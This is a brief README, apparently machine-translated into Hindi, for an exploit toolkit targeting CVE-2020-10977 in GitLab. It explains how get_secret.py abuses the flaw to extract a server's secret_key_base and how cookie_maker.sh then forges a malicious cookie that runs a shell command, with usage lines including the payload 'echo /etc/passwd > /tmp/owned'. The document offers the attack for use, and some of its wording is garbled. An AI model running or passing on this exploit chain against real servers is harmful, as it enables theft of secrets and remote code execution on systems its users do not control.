
cve-2020-10977 पढ़ें और निष्पादित करें
get_secret.py - मुख्य स्क्रिप्ट। यह पहली बार cve-2020-10977 का शोषण करने के लिए thewhiteh4t के कोड का उपयोग करता है और दिए गए रिपॉजिटरी से secret_key_base निकालता है। फिर यह पेलोड के साथ कुकी उत्पन्न करने के लिए cookie_maker.sh लॉन्च करता है।
Usege: python get_secret.py http://gitlab.vh foo gfhjkm123
cookie_maker.sh - डॉकर लॉन्च करता है और दुर्भावनापूर्ण कुकी उत्पन्न करता है। इसे स्टैंडअलोन इस्तेमाल किया जा सकता है।
Usage: cookie_maker.sh <secret_key_base> "echo /etc/passwd > /tmp/owned"
thewhiteh4t के रिपॉजिटरी पर आधारित: https://github.com/thewhiteh4t/cve-2020-10977
इसमें बग हो सकते हैं होने चाहिए। यदि get_secret.py सही ढंग से समाप्त होता है लेकिन इसका आउटपुट कोई कुकी नहीं है - इसे फिर से चलाएँ।